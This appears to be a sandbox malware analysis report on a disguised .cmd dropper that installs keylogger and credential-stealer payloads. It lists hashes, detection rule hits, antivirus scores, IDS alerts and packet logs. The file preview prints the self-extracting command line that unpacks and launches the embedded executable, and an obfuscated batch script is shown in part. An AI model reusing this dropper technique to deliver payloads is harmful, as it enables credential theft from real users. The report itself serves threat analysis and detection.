                                                                                                                            SHA-512:5525D32CB43E6976D8F04EB60281DC7194E8FBC05D39098FD9EBA5E0BDD50C9246A5FA8A88A601940369A97589351F848AD0AB56D6B5B97470FCDBF076572AAE
                                                                                                                            Malicious:true
                                                                                                                            Preview:...8...*............................................................................................8...*9.............8...*............................................................................................................................................................................{.."..~.......{..........!.......#...............!.......}................... .(...{.'......|).%.... .........~.........$..|... ..%}.~.....................#|....{...{...........{....('..~.%....~.........}...|...............$...................$.....|{.$.~|.....|.|.......}$..... .|~.. ...'......$."~...#!...#........!..|...~...|.{....~|...... ........}......&.........~{.........&|... ............ ...!.......%...............}.....$..........{....|...........~%.....|...}...#..%.{....&.........(...{.....#!. .......|.....#....{...........................~%.................}}.......{......|...........).....|.|....%"...|........(..FFI.S.J.<.N.
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1367040
                                                                                                                            Entropy (8bit):7.128358645065541
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:hdk7eYEWx0i5VTe5QCQBSt2jKasCD4LUkq0uHyC6q7KubU+7F:h0eYbSGUelb0uSC6q7bbU+p
                                                                                                                            MD5:9B151296A899B0D58575CDE4E9563D18
                                                                                                                            SHA1:5D329ACEE65D8CEAAC8FAB655E48B19AD954098C
                                                                                                                            SHA-256:C23D87828FB286E90B948E20A91752F82F08F3A1B5A5F1E0AC86BC42A475F018
                                                                                                                            SHA-512:44A820F23012942247DA685095C694906F41F4380F1085D97215E906B4563DA79D5D4C9400082F893AD30282539D341F14FD6E91C5C18856374AA639D9A286E8
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................,...........H.......P....@..........................p...................@..............................V+...................................................................................................................text....!.......".................. ..`.itext.......@.......&.............. ..`.data....*...P...,...0..............@....bss.....7...........\...................idata..V+.......,...\..............@....tls....@................................rdata..............................@..@.reloc..............................@..B.rsrc................4..............@..@.............`......................@..@................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):175800
                                                                                                                            Entropy (8bit):6.631791793070417
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3072:qjyOm0e6/bIhbuwxlEb1MpG+xUEyAn0fYuDGOpPXFZ7on+gUxloDMq:qjyl6ebX45OG+xUEWfYUGOpPXFZ7on+G
                                                                                                                            MD5:22331ABCC9472CC9DC6F37FAF333AA2C
                                                                                                                            SHA1:2A001C30BA79A19CEAF6A09C3567C70311760AA4
                                                                                                                            SHA-256:BDFA725EC2A2C8EA5861D9B4C2F608E631A183FCA7916C1E07A28B656CC8EC0C
                                                                                                                            SHA-512:C7F5BAAD732424B975A426867D3D8B5424AA830AA172ED0FF0EF630070BF2B4213750E123A36D8C5A741E22D3999CA1D7E77C62D4B77D6295B20A38114B7843C
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                            Joe Sandbox View:
                                                                                                                            • Filename: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                            • Filename: Delivery form - Airway bill details - Tracking info 45821631127I ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                            • Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, Detection: malicious, Browse
                                                                                                                            • Filename: Delivery Confirmation Forms - Contact Form TS4047117 pdf.exe, Detection: malicious, Browse
                                                                                                                            • Filename: F.O Pump Istek,Docx.bat, Detection: malicious, Browse
                                                                                                                            • Filename: D.G Governor Istek,Docx.exe, Detection: malicious, Browse
                                                                                                                            • Filename: qDKTsL1y44.exe, Detection: malicious, Browse
                                                                                                                            • Filename: PRODUCT.bat, Detection: malicious, Browse
                                                                                                                            • Filename: purchaseorder.bat, Detection: malicious, Browse
                                                                                                                            • Filename: PO11550.exe, Detection: malicious, Browse
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....>.{..................................... ....@.......................... .......c........... ..............................................................H....................................................................................text............................... ..`.data........ ...P..................@....tls.................`..............@....rdata...............b..............@..P.idata... ...........d..............@..@.edata...............|..8...,...@...@..@
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF">), ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):104
                                                                                                                            Entropy (8bit):5.195196088872013
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM1N6XL3vsbxyuo/v:HRYFVmTWDyzKNafExro/v
                                                                                                                            MD5:190C839EED3F26C7E50710FCE67CE0EC
                                                                                                                            SHA1:A23AA8D322AB22C3917768996D464924AB5A0C1F
                                                                                                                            SHA-256:05D7096C35666AD24E01E3BA5323F52E5C90448D589D26EC625E9A7B581A2142
                                                                                                                            SHA-512:5822FF9A2EB4139717CEA2D03E00FA668EEB8A120C6AB02EF8C767E109EFF6871399E7901252CD8021FACCAE0C45E1E981EF877F8AB7ABE889255C464F79F1E1
                                                                                                                            Malicious:true
                                                                                                                            Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Oupzhkpr.PIF"..IconIndex=968162..HotKey=72..
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                            File Type:DOS batch file, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):15789
                                                                                                                            Entropy (8bit):4.658965888116939
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:wleG1594aKczJRP1dADCDswtJPZ9KZVst1U:LA4aLz08JaJ
                                                                                                                            MD5:CCE3C4AEE8C122DD8C44E64BD7884D83
                                                                                                                            SHA1:C555C812A9145E2CBC66C7C64BA754B0C7528D6D
                                                                                                                            SHA-256:4A12ABB62DD0E5E1391FD51B7448EF4B9DA3B3DC83FF02FB111E15D6A093B5E8
                                                                                                                            SHA-512:EA23EDFB8E3CDA49B78623F6CD8D0294A4F4B9B11570E8478864EBDEE39FCC6B8175B52EB947ED904BE27B5AF2535B9CA08595814557AE569020861A133D827D
                                                                                                                            Malicious:false
                                                                                                                            Preview:.@echo off..@% %e%.%c%o..%h%. .......%o%r.r.r.....% %.......%o%..%f% .%f%o%..s%...... .%e%.r.%t%...o..r.% %.....%"%.......%u%.%T%r..%A%..%j%r........%=%.. o......%s%....o...%e%.....%t%.% %........%"%.r.......o%..%uTAj%"%.. . ..%N%.r r.... %U%... .oo...%M%r.........%j%.....%=%.....o....%=%.%"%r...... %..%uTAj%"% .....%m%..oo%X%.o.. %m%.....or.%w%....%O%.%g%.....%B%.o .r.. %W%..%D%........%t%o.r...%%NUMj%h% ...o.%t%..%t%o......o%p%.........%"% .r%..%uTAj%"% .... ..%G%...o.. ..%n%..rr..%j%..o......%D%...o .r..%R%r.
                                                                                                                            Process:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):520
                                                                                                                            Entropy (8bit):5.355496254154943
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:MLUE4K5E4KlKDE4KhKiKhk
                                                                                                                            MD5:3C255C75EA6EB42410894C0D08A4E324
                                                                                                                            SHA1:34B3512313867B269C545241CD502B960213293A
                                                                                                                            SHA-256:116B1D2FF17BE7FE8C4B6D935688F81C40716AFCD995C76BFC2D1AB2AFA774A7
                                                                                                                            SHA-512:41406D84C3FC3D5EFAD22277382D9ADC444D00FDE95C1B7B6BC17E80452CA5DE084D28D892BC0C6890FE64DC733790E26D0F62FE3477175DCCCAC777FDE5E7EC
                                                                                                                            Malicious:false
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):2232
                                                                                                                            Entropy (8bit):5.380805901110357
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:lGLHyIFKL3IZ2KRH9Ougss
                                                                                                                            MD5:C961E3496AA47D8AF3F9E184D4F78133
                                                                                                                            SHA1:0EFEA67BD361E99BBE642D6EF414EBE7BB6EC134
                                                                                                                            SHA-256:303E0E36CAC4900807E47B6AF8CDAB4FBFDB6A67D66F84F49E283557EA1774B1
                                                                                                                            SHA-512:C3ECDCCF25D96C4F0C7B6407C8BAA7A0496C656C63E4757982FA1A754AF5B7902F3318F0AFE1363F365714584869A5E1E754692A84D814DD9EFDEB909A3104A3
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                            Process:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):98816
                                                                                                                            Entropy (8bit):5.666546286050177
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:qwa4JaIFveZKGAmwJVeDhp0dqnjErVf4UMR7pspNYZd:24Jj4ZKGHwJVeDDKqnj6bMDspNC
                                                                                                                            MD5:F6B8018A27BCDBAA35778849B586D31B
                                                                                                                            SHA1:81BDE9535B07E103F89F6AEABDB873D7E35816C2
                                                                                                                            SHA-256:DDC6B2BD4382D1AE45BEE8F3C4BB19BD20933A55BDF5C2E76C8D6C46BC1516CE
                                                                                                                            SHA-512:AA958D22952D27BAD1C0D3C9D08DDBF364274363D5359791B7B06A5D5D91A21F57E9C9E1079F3F95D7CE5828DCD3E79914FF2BD836F347B5734151D668D935DE
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Joe Security
                                                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: unknown
                                                                                                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, Author: Florian Roth
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....nH...............P..x............... ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...................Z....................................................}.....is.......................~...F...@...7...%...m...$...~...~...d...r...a...G...o...n...~.....(....*&..( ....*.s!........s"........s#........s$........s%........*Z........o8...........*&..(9....*&........*".......*Vs....(B...t.........*..(C...*"~....+.*"~....+.*"~....+.*"~....+.*"~....+.*b.r...p.oa...(....(@....*:.~.....o....&*.*:.(P....(Q....*..~3...,.~3...+.~1.....x...s....%.3...(.....*..(Y....(L...
                                                                                                                            Process:C:\Users\Public\Libraries\rpkhzpuO.pif
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):70656
                                                                                                                            Entropy (8bit):4.910353963160109
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:ZPqWETbZazuYx3cOBB03Cmp3gGLWUTbUwjKX4C2b+d:ZizbZazunOKrp3gGhTbUwjI4C2Sd
                                                                                                                            MD5:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                            SHA1:396E954077D21E94B7C20F7AFA22A76C0ED522D0
                                                                                                                            SHA-256:F19763B48B2D2CC92E61127DD0B29760A1C630F03AD7F5055FD1ED9C7D439428
                                                                                                                            SHA-512:227D7DAD569D77EF84326E905B7726C722CEFF331246DE4F5CF84428B9721F8B2732A31401DF6A8CEF7513BCD693417D74CDD65D54E43C710D44D1726F14B0C5
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                            Process:C:\Windows\System32\extrac32.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1367040
                                                                                                                            Entropy (8bit):7.128358645065541
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:hdk7eYEWx0i5VTe5QCQBSt2jKasCD4LUkq0uHyC6q7KubU+7F:h0eYbSGUelb0uSC6q7bbU+p
                                                                                                                            MD5:9B151296A899B0D58575CDE4E9563D18
                                                                                                                            SHA1:5D329ACEE65D8CEAAC8FAB655E48B19AD954098C
                                                                                                                            SHA-256:C23D87828FB286E90B948E20A91752F82F08F3A1B5A5F1E0AC86BC42A475F018
                                                                                                                            SHA-512:44A820F23012942247DA685095C694906F41F4380F1085D97215E906B4563DA79D5D4C9400082F893AD30282539D341F14FD6E91C5C18856374AA639D9A286E8
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: ReversingLabs, Detection: 18%
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................,...........H.......P....@..........................p...................@..............................V+...................................................................................................................text....!.......".................. ..`.itext.......@.......&.............. ..`.data....*...P...,...0..............@....bss.....7...........\...................idata..V+.......,...\..............@....tls....@................................rdata..............................@..@.reloc..............................@..B.rsrc................4..............@..@.............`......................@..@................................................................................................
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):665670656
                                                                                                                            Entropy (8bit):7.9999993453564295
                                                                                                                            Encrypted:true
                                                                                                                            SSDEEP:
                                                                                                                            MD5:8D01E7CA64DB66A5D357A071C6E39643
                                                                                                                            SHA1:364D01736FBB031568A71BDE8146E3D1FD5265B5
                                                                                                                            SHA-256:0B78E23DA1460081F32F9058E009E5E1F874DD79C16B795064DAB859CD436953
                                                                                                                            SHA-512:C0377ED66F448973AD53DF4B9AC5FF51A6722A4A0E999D2B80B04822BB511068959DA3F446D148E1023249133341C189FB12AA966D4EC4C76DB1463920490F3D
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............n)... ...@....@.. ....................................`..................................)..W....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P)......H........>...............=..p...........................................".(!....*..s3...z..*.s.........*.(.....*Z~ ...oK...~....(!....*.(5....*&.(!.....*".......*".(u....*Vs....(v...t.........*&..(.....*Br...p(.....(...*.sL....)...*.*...0...........r...p....s........ ................. ........8[...........o.........................% ....X....o....a.o.............o....]......... ....X............o....?....(........o....o ...............8........*....0..........r)..p(....("....
                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Mon Dec 30 09:47:03 2024, mtime=Mon Dec 30 09:47:03 2024, atime=Mon Dec 30 09:47:03 2024, length=70656, window=
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1784
                                                                                                                            Entropy (8bit):3.5081498296654248
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:8ovRD00lXUDwkPw0kSfAjVoFG9xR+O4ZvPqR0Jm:8WRD00l/kPlUWuR+ZXqRk
                                                                                                                            MD5:200EAEED75607E88CDA168F62500CE15
                                                                                                                            SHA1:51374CEE492228A01DF78DC494B09081C5E6AAD5
                                                                                                                            SHA-256:C4F98DFEA3D705654EC672C5A9E0F3BF4721434AF995E901CD9E40E3E8C4F3B8
                                                                                                                            SHA-512:C24FB9AC7A98B4CB8E11042A8A9731E243567F02DFB32EAAA444CEB08C22D9B6A8BD27AB6AABBAF053133D93F8659181C1274FC0D3E12F7771ADE1A99DD5257C
                                                                                                                            Malicious:false
                                                                                                                            Preview:L..................F.@.. ...M..).Z..G..).Z..G..).Z............................:..DG..Yr?.D..U..k0.&...&.......$..S...I....Z..k.).Z......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2.Y.U...........................^.A.p.p.D.a.t.a...B.V.1......Y.U..Roaming.@......EW<2.Y.U..../.........................R.o.a.m.i.n.g.....T.1......Y.U..ACCApi..>......Y.U.Y.U....0.......................E.A.C.C.A.p.i.....b.2......Y.U .apihost.exe.H......Y.U.Y.U....6.......................<.a.p.i.h.o.s.t...e.x.e.......c...............-.......b............`.......C:\Users\user\AppData\Roaming\ACCApi\apihost.exe....A.c.c.S.y.s.!.....\.....\.....\.....\.....\.A.C.C.A.p.i.\.a.p.i.h.o.s.t...e.x.e.6.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.T.r.a.d.i.n.g._.A.I.B.o.t...e.x.e.........%USERPROFILE%\AppData\Local\Temp\Trading_AIBot.exe...................................................................................................................
                                                                                                                            File type:Microsoft Cabinet archive data, Windows 2000/XP setup, 4294967295 bytes, 1 file, at 0x75 +A "x.exe", number 1, 42 datablocks, 0 compression
                                                                                                                            Entropy (8bit):7.127805671783416
                                                                                                                            TrID:
                                                                                                                            • Microsoft Cabinet Archive (8008/1) 99.91%
                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.09%
                                                                                                                            File name:PO_KB#67897.cmd
                                                                                                                            File size:1'367'515 bytes
                                                                                                                            MD5:4eb1270d4006c687782644391aa435d3
                                                                                                                            SHA1:bf92d77c0f777ba31d635c049200774604dea87f
                                                                                                                            SHA256:cdc5d714c1b295153567e4047bb0d907a18e6b80863ac159ad4d1777d8919ee3
                                                                                                                            SHA512:4461e0984f12dad58f4c4bc79ce931752911c2a280c68549db85b759cb259ebb362763902cb6bd0dcc32ea4f9057955dd92bf53933c17d1a4603dae96ea37a9c
                                                                                                                            SSDEEP:24576:hdk7mYEWdYG5VnelkCQtStC7KeoG38PIki4KTyW6O7K6bU+7l:h0mY3W+wO1b4K+W6O7nbU+5
                                                                                                                            TLSH:4F55BE3DBE5188B3D23E1D394FCA7A961426BE532D29DECA13E50F2C5E393613825187
                                                                                                                            File Content Preview:MSCF............u.......................*.......cls && extrac32 /y "%~f0" "%tmp%\x.exe" && start "" "%tmp%\x.exe".................. .x.exe.........MZP.....................@...............................................!..L.!..This program must be run und
                                                                                                                            Icon Hash:9686878b929a9886
                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                            2024-12-30T11:46:57.454696+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.64971241.185.8.252443TCP
                                                                                                                            2024-12-30T11:47:04.894030+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.649720193.122.130.080TCP
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 30, 2024 11:46:56.441936016 CET49711443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:56.441987991 CET4434971141.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:56.442082882 CET49711443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:56.442306995 CET49711443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:56.442344904 CET4434971141.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:56.442565918 CET49711443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:56.472480059 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:56.472533941 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:56.472629070 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:56.475526094 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:56.475543022 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:57.454546928 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:57.454695940 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:57.458785057 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:57.458800077 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:57.459130049 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:57.512989044 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:57.578888893 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:57.623339891 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.006376982 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.006403923 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.006416082 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.006433010 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.006443024 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.006452084 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.006481886 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.006514072 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.006530046 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.006556988 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.191047907 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.191078901 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.191154003 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.191183090 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.191199064 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.191215038 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.401374102 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.401407957 CET4434971241.185.8.252192.168.2.6
